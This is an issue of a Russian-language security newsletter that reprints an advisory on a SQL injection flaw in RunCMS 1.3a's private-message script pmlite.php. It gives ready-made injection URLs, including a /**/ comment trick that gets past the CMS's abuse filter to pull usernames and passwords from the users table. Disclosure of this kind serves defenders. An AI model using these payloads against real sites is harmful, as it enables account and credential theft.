Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Runcms.


Компьютер для продвинутых пользователей
Содержание:
RUNCMS
ПО: RUNCMS
Версия: 1.3a

О программе:
Runcms включает в себя множество необходимых веб-мастеры cms форм: страничку закачки, ссылки, секцию обучения, форумы, новости и т.д. Возможно управление пользователей через группы с модульно-блоковой с специфичным способом доступа, расширение функционала с помощью плагинов и т.д.
Описание:
Отправление личного сообщения.
Следующий URL может использоваться для применения SQL-инъекции в pmlite.php:
http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL-INJECTION]
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1union select pass from runcms_users
Внутренняя RUNCMS защита заблокирует данный запрос и переадресует вас на http://localhost/abuse.php и вы увидите следующие сообщение:
" WARNING !!!!!! You were trying to abuse the system, a logfile was created ..."
В чем же проблема?
Как было проверенно RUNMCS фильтрует все запросы, кроме union select.
Использование:
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir
RUNCMS
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можной найти: 273214003

В избранное